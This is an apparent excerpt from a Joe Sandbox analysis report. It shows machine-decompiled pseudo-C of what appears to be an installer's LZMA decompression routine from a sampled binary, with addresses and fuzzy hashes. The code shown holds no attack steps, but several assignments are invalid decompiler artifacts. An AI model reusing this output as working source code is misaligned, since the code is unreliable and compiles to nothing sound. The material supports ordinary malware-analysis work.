                            								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                            								__eax =  *(__ebp - 0x30);
                            								_t400 = __ebp - 0x60;
                            								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                            								__eflags =  *_t400;
                            								goto L123;
                            							}
                            							__ecx = __ebx;
                            							__eax = __ebx;
                            							__ecx = __ebx >> 1;
                            							__eax = __ebx & 0x00000001;
                            							__ecx = (__ebx >> 1) - 1;
                            							__al = __al | 0x00000002;
                            							__eax = (__ebx & 0x00000001) << __cl;
                            							__eflags = __ebx - 0xe;
                            							 *(__ebp - 0x2c) = __eax;
                            							if(__ebx >= 0xe) {
                            								__ebx = 0;
                            								 *(__ebp - 0x48) = __ecx;
                            								L102:
                            								__eflags =  *(__ebp - 0x48);
                            								if( *(__ebp - 0x48) <= 0) {
                            									__eax = __eax + __ebx;
                            									 *(__ebp - 0x40) = 4;
                            									 *(__ebp - 0x2c) = __eax;
                            									__eax =  *(__ebp - 4);
                            									__eax =  *(__ebp - 4) + 0x644;
                            									__eflags = __eax;
                            									L108:
                            									__ebx = 0;
                            									 *(__ebp - 0x58) = __eax;
                            									 *(__ebp - 0x50) = 1;
                            									 *(__ebp - 0x44) = 0;
                            									 *(__ebp - 0x48) = 0;
                            									L112:
                            									__eax =  *(__ebp - 0x40);
                            									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                            									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                            										_t391 = __ebp - 0x2c;
                            										 *_t391 =  *(__ebp - 0x2c) + __ebx;
                            										__eflags =  *_t391;
                            										goto L119;
                            									}
                            									__eax =  *(__ebp - 0x50);
                            									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                            									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                            									__eax =  *(__ebp - 0x58);
                            									__esi = __edi + __eax;
                            									 *(__ebp - 0x54) = __esi;
                            									__ax =  *__esi;
                            									__ecx = __ax & 0x0000ffff;
                            									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                            									__eflags =  *(__ebp - 0xc) - __edx;
                            									if( *(__ebp - 0xc) >= __edx) {
                            										__ecx = 0;
                            										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                            										__ecx = 1;
                            										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                            										__ebx = 1;
                            										__ecx =  *(__ebp - 0x48);
                            										__ebx = 1 << __cl;
                            										__ecx = 1 << __cl;
                            										__ebx =  *(__ebp - 0x44);
                            										__ebx =  *(__ebp - 0x44) | __ecx;
                            										__cx = __ax;
                            										__cx = __ax >> 5;
                            										__eax = __eax - __ecx;
                            										__edi = __edi + 1;
                            										__eflags = __edi;
                            										 *(__ebp - 0x44) = __ebx;
                            										 *__esi = __ax;
                            										 *(__ebp - 0x50) = __edi;
                            									} else {
                            										 *(__ebp - 0x10) = __edx;
                            										0x800 = 0x800 - __ecx;
                            										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                            										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                            										 *__esi = __dx;
                            									}
                            									__eflags =  *(__ebp - 0x10) - 0x1000000;
                            									if( *(__ebp - 0x10) >= 0x1000000) {
                            										L111:
                            										_t368 = __ebp - 0x48;
                            										 *_t368 =  *(__ebp - 0x48) + 1;
                            										__eflags =  *_t368;
                            										goto L112;
                            									} else {
                            										goto L109;
                            									}
                            								}
                            								__ecx =  *(__ebp - 0xc);
                            								__ebx = __ebx + __ebx;
                            								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                            								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                            								 *(__ebp - 0x44) = __ebx;
                            								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                            									__ecx =  *(__ebp - 0x10);
                            									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                            									__ebx = __ebx | 0x00000001;
                            									__eflags = __ebx;
                            									 *(__ebp - 0x44) = __ebx;
                            								}
                            								__eflags =  *(__ebp - 0x10) - 0x1000000;
                            								if( *(__ebp - 0x10) >= 0x1000000) {
                            									L101:
                            									_t338 = __ebp - 0x48;
                            									 *_t338 =  *(__ebp - 0x48) - 1;
                            									__eflags =  *_t338;
                            									goto L102;
                            								} else {
                            									goto L99;
                            								}
                            							}
                            							__edx =  *(__ebp - 4);
                            							__eax = __eax - __ebx;
                            							 *(__ebp - 0x40) = __ecx;
                            							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                            							goto L108;
                            						case 0x1a:
                            							L56:
                            							__eflags =  *(__ebp - 0x64);
                            							if( *(__ebp - 0x64) == 0) {
                            								 *(__ebp - 0x88) = 0x1a;
                            								goto L170;
                            							}
                            							__ecx =  *(__ebp - 0x68);
                            							__al =  *(__ebp - 0x5c);
                            							__edx =  *(__ebp - 8);
                            							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                            							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                            							 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                            							 *( *(__ebp - 0x68)) = __al;
                            							__ecx =  *(__ebp - 0x14);
                            							 *(__ecx +  *(__ebp - 8)) = __al;
                            							__eax = __ecx + 1;
                            							__edx = 0;
                            							_t192 = __eax %  *(__ebp - 0x74);
                            							__eax = __eax /  *(__ebp - 0x74);
                            							__edx = _t192;
                            							goto L79;
                            						case 0x1b:
                            							goto L75;
                            						case 0x1c:
                            							while(1) {
                            								L123:
                            								__eflags =  *(__ebp - 0x64);
                            								if( *(__ebp - 0x64) == 0) {
                            									break;
                            								}
                            								__eax =  *(__ebp - 0x14);
                            								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                            								__eflags = __eax -  *(__ebp - 0x74);
                            								if(__eax >=  *(__ebp - 0x74)) {
                            									__eax = __eax +  *(__ebp - 0x74);
                            									__eflags = __eax;
                            								}
                            								__edx =  *(__ebp - 8);
                            								__cl =  *(__eax + __edx);
                            								__eax =  *(__ebp - 0x14);
                            								 *(__ebp - 0x5c) = __cl;
                            								 *(__eax + __edx) = __cl;
                            								__eax = __eax + 1;
                            								__edx = 0;
                            								_t414 = __eax %  *(__ebp - 0x74);
                            								__eax = __eax /  *(__ebp - 0x74);
                            								__edx = _t414;
                            								__eax =  *(__ebp - 0x68);
                            								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                            								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                            								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                            								__eflags =  *(__ebp - 0x30);
                            								 *( *(__ebp - 0x68)) = __cl;
                            								 *(__ebp - 0x14) = _t414;
                            								if( *(__ebp - 0x30) > 0) {
                            									continue;
                            								} else {
                            									goto L80;
                            								}
                            							}
                            							 *(__ebp - 0x88) = 0x1c;
                            							goto L170;
                            					}
                            				}
                            			}













                            0x004071e2
                            0x004071e5
                            0x00000000
                            0x00000000
                            0x00406f44
                            0x00406f44
                            0x00406f48
                            0x0040758d
                            0x00000000
                            0x0040758d
                            0x00406f4e
                            0x00406f51
                            0x00406f54
                            0x00406f57
                            0x00406f5a
                            0x00406f5d
                            0x00406f60
                            0x00406f62
                            0x00406f65
                            0x00406f68
                            0x00406f6b
                            0x00406f6d
                            0x00406f6d
                            0x00406f6d
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x0040734c
                            0x0040734c
                            0x0040734c
                            0x00407350
                            0x00000000
                            0x00000000
                            0x00407356
                            0x00407359
                            0x0040735c
                            0x0040735f
                            0x00407361
                            0x00407361
                            0x00407361
                            0x00407364
                            0x00407367
                            0x0040736a
                            0x0040736d
                            0x00407370
                            0x00407373
                            0x00407374
                            0x00407376
                            0x00407376
                            0x00407376
                            0x00407379
                            0x0040737c
                            0x0040737f
                            0x00407382
                            0x00407385
                            0x00407389
                            0x0040738b
                            0x0040738e
                            0x00000000
                            0x00407390
                            0x00000000
                            0x00407390
                            0x0040738e
                            0x004075c3
                            0x00000000
                            0x00000000
                            0x00406bf2

                            Memory Dump Source
                            • Source File: 00000000.00000002.322657168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.322651210.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.322670175.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.322678692.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.322678692.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.322678692.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.322678692.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.322678692.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.322678692.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.322773729.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_YSpCB8DEek.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 93c083d05bcdf6195ca23c2a54f1652f9efbc2f2339d63ff2f761c89645e7c92
                            • Instruction ID: 0a676f48c9952aad729ccf503b6a86ce95496029d8c73069f89f3073be052f6e
                            • Opcode Fuzzy Hash: 93c083d05bcdf6195ca23c2a54f1652f9efbc2f2339d63ff2f761c89645e7c92
                            • Instruction Fuzzy Hash: C3813471D08228DFDF24CFA8C8847ADBBB1FB44305F24816AD456BB281D778A986DF05
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 98%
                            			E00406FFE() {
                            				signed int _t539;
                            				unsigned short _t540;
                            				signed int _t541;
                            				void _t542;
                            				signed int _t543;
                            				signed int _t544;
                            				signed int _t573;
                            				signed int _t576;
                            				signed int _t597;
                            				signed int* _t614;
                            				void* _t621;
                            
                            				L0:
                            				while(1) {
                            					L0:
                            					if( *(_t621 - 0x40) != 1) {
                            						 *((intOrPtr*)(_t621 - 0x80)) = 0x16;
                            						 *((intOrPtr*)(_t621 - 0x20)) =  *((intOrPtr*)(_t621 - 0x24));
                            						 *((intOrPtr*)(_t621 - 0x24)) =  *((intOrPtr*)(_t621 - 0x28));
                            						 *((intOrPtr*)(_t621 - 0x28)) =  *((intOrPtr*)(_t621 - 0x2c));
                            						 *(_t621 - 0x38) = ((0 |  *(_t621 - 0x38) - 0x00000007 >= 0x00000000) - 0x00000001 & 0x000000fd) + 0xa;
                            						_t539 =  *(_t621 - 4) + 0x664;
                            						 *(_t621 - 0x58) = _t539;
                            						goto L68;
                            					} else {
                            						 *(__ebp - 0x84) = 8;
                            						while(1) {
                            							L132:
                            							 *(_t621 - 0x54) = _t614;
                            							while(1) {
                            								L133:
                            								_t540 =  *_t614;
                            								_t597 = _t540 & 0x0000ffff;
                            								_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
                            								if( *(_t621 - 0xc) >= _t573) {
                            									 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
                            									 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
                            									 *(_t621 - 0x40) = 1;
                            									_t541 = _t540 - (_t540 >> 5);
                            									 *_t614 = _t541;
                            								} else {
                            									 *(_t621 - 0x10) = _t573;
                            									 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
                            									 *_t614 = (0x800 - _t597 >> 5) + _t540;
                            								}
                            								if( *(_t621 - 0x10) >= 0x1000000) {
                            									goto L139;
                            								}
                            								L137:
                            								if( *(_t621 - 0x6c) == 0) {
                            									 *(_t621 - 0x88) = 5;
                            									L170:
                            									_t576 = 0x22;
                            									memcpy( *(_t621 - 0x90), _t621 - 0x88, _t576 << 2);
                            									_t544 = 0;
                            									L172:
                            									return _t544;
                            								}
                            								 *(_t621 - 0x10) =  *(_t621 - 0x10) << 8;
                            								 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
                            								 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
                            								 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
                            								L139:
                            								_t542 =  *(_t621 - 0x84);
                            								while(1) {
                            									 *(_t621 - 0x88) = _t542;
                            									while(1) {
                            										L1:
                            										_t543 =  *(_t621 - 0x88);
                            										if(_t543 > 0x1c) {
                            											break;
                            										}
                            										switch( *((intOrPtr*)(_t543 * 4 +  &M00407602))) {
                            											case 0:
                            												if( *(_t621 - 0x6c) == 0) {
                            													goto L170;
                            												}
                            												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
                            												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
                            												_t543 =  *( *(_t621 - 0x70));
                            												if(_t543 > 0xe1) {
                            													goto L171;
                            												}
                            												_t547 = _t543 & 0x000000ff;
                            												_push(0x2d);
                            												asm("cdq");
                            												_pop(_t578);
                            												_push(9);
                            												_pop(_t579);
                            												_t617 = _t547 / _t578;
                            												_t549 = _t547 % _t578 & 0x000000ff;
                            												asm("cdq");
                            												_t612 = _t549 % _t579 & 0x000000ff;
                            												 *(_t621 - 0x3c) = _t612;
                            												 *(_t621 - 0x1c) = (1 << _t617) - 1;
                            												 *((intOrPtr*)(_t621 - 0x18)) = (1 << _t549 / _t579) - 1;
                            												_t620 = (0x300 << _t612 + _t617) + 0x736;
                            												if(0x600 ==  *((intOrPtr*)(_t621 - 0x78))) {
                            													L10:
                            													if(_t620 == 0) {
                            														L12:
                            														 *(_t621 - 0x48) =  *(_t621 - 0x48) & 0x00000000;
                            														 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
                            														goto L15;
                            													} else {
                            														goto L11;
                            													}
                            													do {
                            														L11:
                            														_t620 = _t620 - 1;
                            														 *((short*)( *(_t621 - 4) + _t620 * 2)) = 0x400;
                            													} while (_t620 != 0);
                            													goto L12;
                            												}
                            												if( *(_t621 - 4) != 0) {
                            													GlobalFree( *(_t621 - 4));
                            												}
                            												_t543 = GlobalAlloc(0x40, 0x600); // executed
                            												 *(_t621 - 4) = _t543;
                            												if(_t543 == 0) {
                            													goto L171;
                            												} else {
                            													 *((intOrPtr*)(_t621 - 0x78)) = 0x600;
                            													goto L10;
                            												}
                            											case 1:
                            												L13:
                            												__eflags =  *(_t621 - 0x6c);
                            												if( *(_t621 - 0x6c) == 0) {
                            													 *(_t621 - 0x88) = 1;
                            													goto L170;
                            												}
                            												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
                            												 *(_t621 - 0x40) =  *(_t621 - 0x40) | ( *( *(_t621 - 0x70)) & 0x000000ff) <<  *(_t621 - 0x48) << 0x00000003;
                            												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
                            												_t45 = _t621 - 0x48;
                            												 *_t45 =  *(_t621 - 0x48) + 1;
                            												__eflags =  *_t45;
                            												L15:
                            												if( *(_t621 - 0x48) < 4) {
                            													goto L13;
                            												}
                            												_t555 =  *(_t621 - 0x40);
                            												if(_t555 ==  *(_t621 - 0x74)) {
                            													L20:
                            													 *(_t621 - 0x48) = 5;
                            													 *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) =  *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) & 0x00000000;
                            													goto L23;
                            												}
                            												 *(_t621 - 0x74) = _t555;
                            												if( *(_t621 - 8) != 0) {
                            													GlobalFree( *(_t621 - 8));
                            												}
                            												_t543 = GlobalAlloc(0x40,  *(_t621 - 0x40)); // executed
                            												 *(_t621 - 8) = _t543;
                            												if(_t543 == 0) {
                            													goto L171;
                            												} else {
                            													goto L20;
                            												}
                            											case 2:
                            												L24:
                            												_t562 =  *(_t621 - 0x60) &  *(_t621 - 0x1c);
                            												 *(_t621 - 0x84) = 6;
                            												 *(_t621 - 0x4c) = _t562;
                            												_t614 =  *(_t621 - 4) + (( *(_t621 - 0x38) << 4) + _t562) * 2;
                            												goto L132;
                            											case 3:
                            												L21:
                            												__eflags =  *(_t621 - 0x6c);
                            												if( *(_t621 - 0x6c) == 0) {
                            													 *(_t621 - 0x88) = 3;
                            													goto L170;
                            												}
                            												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
                            												_t67 = _t621 - 0x70;
                            												 *_t67 =  &(( *(_t621 - 0x70))[1]);
                            												__eflags =  *_t67;
                            												 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
                            												L23:
                            												 *(_t621 - 0x48) =  *(_t621 - 0x48) - 1;
                            												if( *(_t621 - 0x48) != 0) {
                            													goto L21;
                            												}
                            												goto L24;
                            											case 4:
                            												L133:
                            												_t540 =  *_t614;
                            												_t597 = _t540 & 0x0000ffff;
                            												_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
                            												if( *(_t621 - 0xc) >= _t573) {
                            													 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
                            													 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
                            													 *(_t621 - 0x40) = 1;
                            													_t541 = _t540 - (_t540 >> 5);
                            													 *_t614 = _t541;
                            												} else {
                            													 *(_t621 - 0x10) = _t573;
                            													 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
                            													 *_t614 = (0x800 - _t597 >> 5) + _t540;
                            												}
                            												if( *(_t621 - 0x10) >= 0x1000000) {
                            													goto L139;
                            												}
                            											case 5:
                            												goto L137;
                            											case 6:
                            												__edx = 0;
                            												__eflags =  *(__ebp - 0x40);
                            												if( *(__ebp - 0x40) != 0) {
                            													__eax =  *(__ebp - 4);
                            													__ecx =  *(__ebp - 0x38);
                            													 *(__ebp - 0x34) = 1;
                            													 *(__ebp - 0x84) = 7;
                            													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                            													L132:
                            													 *(_t621 - 0x54) = _t614;
                            													goto L133;
                            												}
                            												__eax =  *(__ebp - 0x5c) & 0x000000ff;
                            												__esi =  *(__ebp - 0x60);
                            												__cl = 8;
                            												__cl = 8 -  *(__ebp - 0x3c);
                            												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                            												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                            												__ecx =  *(__ebp - 0x3c);
                            												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                            												__ecx =  *(__ebp - 4);
                            												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                            												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                            												__eflags =  *(__ebp - 0x38) - 4;
                            												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                            												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                            												if( *(__ebp - 0x38) >= 4) {
                            													__eflags =  *(__ebp - 0x38) - 0xa;
                            													if( *(__ebp - 0x38) >= 0xa) {
                            														_t98 = __ebp - 0x38;
                            														 *_t98 =  *(__ebp - 0x38) - 6;
                            														__eflags =  *_t98;
                            													} else {
                            														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                            													}
                            												} else {
                            													 *(__ebp - 0x38) = 0;
                            												}
                            												__eflags =  *(__ebp - 0x34) - __edx;
                            												if( *(__ebp - 0x34) == __edx) {
                            													__ebx = 0;
                            													__ebx = 1;
                            													goto L61;
                            												} else {
                            													__eax =  *(__ebp - 0x14);
                            													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                            													__eflags = __eax -  *(__ebp - 0x74);
                            													if(__eax >=  *(__ebp - 0x74)) {
                            														__eax = __eax +  *(__ebp - 0x74);
                            														__eflags = __eax;
                            													}
                            													__ecx =  *(__ebp - 8);
                            													__ebx = 0;
                            													__ebx = 1;
                            													__al =  *((intOrPtr*)(__eax + __ecx));
                            													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                            													goto L41;
                            												}
                            											case 7:
                            												goto L0;
                            											case 8:
                            												__eflags =  *(__ebp - 0x40);
                            												if( *(__ebp - 0x40) != 0) {
                            													__eax =  *(__ebp - 4);
                            													__ecx =  *(__ebp - 0x38);
                            													 *(__ebp - 0x84) = 0xa;
                            													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                            												} else {
                            													__eax =  *(__ebp - 0x38);
                            													__ecx =  *(__ebp - 4);
                            													__eax =  *(__ebp - 0x38) + 0xf;
                            													 *(__ebp - 0x84) = 9;
                            													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                            													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                            												}
                            												while(1) {
                            													L132:
                            													 *(_t621 - 0x54) = _t614;
                            													goto L133;
                            												}
                            											case 9:
                            												__eflags =  *(__ebp - 0x40);
                            												if( *(__ebp - 0x40) != 0) {
                            													goto L89;
                            												}
                            												__eflags =  *(__ebp - 0x60);
                            												if( *(__ebp - 0x60) == 0) {
                            													goto L171;
                            												}
                            												__eax = 0;
                            												__eflags =  *(__ebp - 0x38) - 7;
                            												_t258 =  *(__ebp - 0x38) - 7 >= 0;
                            												__eflags = _t258;
                            												0 | _t258 = _t258 + _t258 + 9;
                            												 *(__ebp - 0x38) = _t258 + _t258 + 9;
                            												goto L75;
                            											case 0xa:
                            												__eflags =  *(__ebp - 0x40);
                            												if( *(__ebp - 0x40) != 0) {
                            													__eax =  *(__ebp - 4);
                            													__ecx =  *(__ebp - 0x38);
                            													 *(__ebp - 0x84) = 0xb;
                            													__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                            													while(1) {
                            														L132:
                            														 *(_t621 - 0x54) = _t614;
                            														goto L133;
                            													}
                            												}
                            												__eax =  *(__ebp - 0x28);
                            												goto L88;
                            											case 0xb:
                            												__eflags =  *(__ebp - 0x40);
                            												if( *(__ebp - 0x40) != 0) {
                            													__ecx =  *(__ebp - 0x24);
                            													__eax =  *(__ebp - 0x20);
                            													 *(__ebp - 0x20) =  *(__ebp - 0x24);
                            												} else {
                            													__eax =  *(__ebp - 0x24);
                            												}
                            												__ecx =  *(__ebp - 0x28);
                            												 *(__ebp - 0x24) =  *(__ebp - 0x28);
                            												L88:
                            												__ecx =  *(__ebp - 0x2c);
                            												 *(__ebp - 0x2c) = __eax;
                            												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                            												L89:
                            												__eax =  *(__ebp - 4);
                            												 *(__ebp - 0x80) = 0x15;
                            												__eax =  *(__ebp - 4) + 0xa68;
                            												 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                            												goto L68;
                            											case 0xc:
                            												L99:
                            												__eflags =  *(__ebp - 0x6c);
                            												if( *(__ebp - 0x6c) == 0) {
                            													 *(__ebp - 0x88) = 0xc;
                            													goto L170;
                            												}
                            												__ecx =  *(__ebp - 0x70);
                            												__eax =  *(__ebp - 0xc);
                            												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                            												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                            												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                            												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                            												_t334 = __ebp - 0x70;
                            												 *_t334 =  *(__ebp - 0x70) + 1;
                            												__eflags =  *_t334;
                            												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                            												__eax =  *(__ebp - 0x2c);
                            												goto L101;
                            											case 0xd:
                            												L37:
                            												__eflags =  *(__ebp - 0x6c);
                            												if( *(__ebp - 0x6c) == 0) {
                            													 *(__ebp - 0x88) = 0xd;
                            													goto L170;
                            												}
                            												__ecx =  *(__ebp - 0x70);
                            												__eax =  *(__ebp - 0xc);
                            												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                            												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                            												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                            												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                            												_t122 = __ebp - 0x70;
                            												 *_t122 =  *(__ebp - 0x70) + 1;
                            												__eflags =  *_t122;
                            												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                            												L39:
                            												__eax =  *(__ebp - 0x40);
                            												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                            												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                            													goto L48;
                            												}
                            												__eflags = __ebx - 0x100;
                            												if(__ebx >= 0x100) {
                            													goto L54;
                            												}
                            												L41:
                            												__eax =  *(__ebp - 0x5b) & 0x000000ff;
                            												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                            												__ecx =  *(__ebp - 0x58);
                            												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                            												 *(__ebp - 0x48) = __eax;
                            												__eax = __eax + 1;
                            												__eax = __eax << 8;
                            												__eax = __eax + __ebx;
                            												__esi =  *(__ebp - 0x58) + __eax * 2;
                            												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                            												__ax =  *__esi;
                            												 *(__ebp - 0x54) = __esi;
                            												__edx = __ax & 0x0000ffff;
                            												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                            												__eflags =  *(__ebp - 0xc) - __ecx;
                            												if( *(__ebp - 0xc) >= __ecx) {
                            													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                            													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                            													__cx = __ax;
                            													 *(__ebp - 0x40) = 1;
                            													__cx = __ax >> 5;
                            													__eflags = __eax;
                            													__ebx = __ebx + __ebx + 1;
                            													 *__esi = __ax;
                            												} else {
                            													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                            													 *(__ebp - 0x10) = __ecx;
                            													0x800 = 0x800 - __edx;
                            													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                            													__ebx = __ebx + __ebx;
                            													 *__esi = __cx;
                            												}
                            												__eflags =  *(__ebp - 0x10) - 0x1000000;
                            												 *(__ebp - 0x44) = __ebx;
                            												if( *(__ebp - 0x10) >= 0x1000000) {
                            													goto L39;
                            												} else {
                            													goto L37;
                            												}
                            											case 0xe:
                            												L46:
                            												__eflags =  *(__ebp - 0x6c);
                            												if( *(__ebp - 0x6c) == 0) {
                            													 *(__ebp - 0x88) = 0xe;
                            													goto L170;
                            												}
                            												__ecx =  *(__ebp - 0x70);
                            												__eax =  *(__ebp - 0xc);
                            												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                            												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                            												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                            												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                            												_t156 = __ebp - 0x70;
                            												 *_t156 =  *(__ebp - 0x70) + 1;
                            												__eflags =  *_t156;
                            												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                            												while(1) {
                            													L48:
                            													__eflags = __ebx - 0x100;
                            													if(__ebx >= 0x100) {
                            														break;
                            													}
                            													__eax =  *(__ebp - 0x58);
                            													__edx = __ebx + __ebx;
                            													__ecx =  *(__ebp - 0x10);
                            													__esi = __edx + __eax;
                            													__ecx =  *(__ebp - 0x10) >> 0xb;
                            													__ax =  *__esi;
                            													 *(__ebp - 0x54) = __esi;
                            													__edi = __ax & 0x0000ffff;
                            													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                            													__eflags =  *(__ebp - 0xc) - __ecx;
                            													if( *(__ebp - 0xc) >= __ecx) {
                            														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                            														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                            														__cx = __ax;
                            														_t170 = __edx + 1; // 0x1
                            														__ebx = _t170;
                            														__cx = __ax >> 5;
                            														__eflags = __eax;
                            														 *__esi = __ax;
                            													} else {
